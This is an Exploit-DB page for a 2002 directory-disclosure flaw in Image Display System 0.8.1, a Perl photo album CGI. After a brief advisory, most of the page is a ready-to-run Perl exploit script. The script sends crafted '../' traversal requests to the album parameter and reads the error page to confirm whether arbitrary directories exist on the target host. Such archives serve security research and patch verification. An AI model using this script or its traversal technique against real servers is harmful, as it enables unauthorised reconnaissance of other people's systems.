Image Display System 0.8.1 - Directory Existence Disclosure

EDB-ID:

21487

CVE:

2002-1837

EDB Verified:

Author:

isox

Type:

webapps

Exploit:   /  

Platform:

CGI

Date:

2002-05-28

Vulnerable App: 
source: https://www.securityfocus.com/bid/4870/info

IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.

Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not. 

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }


  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services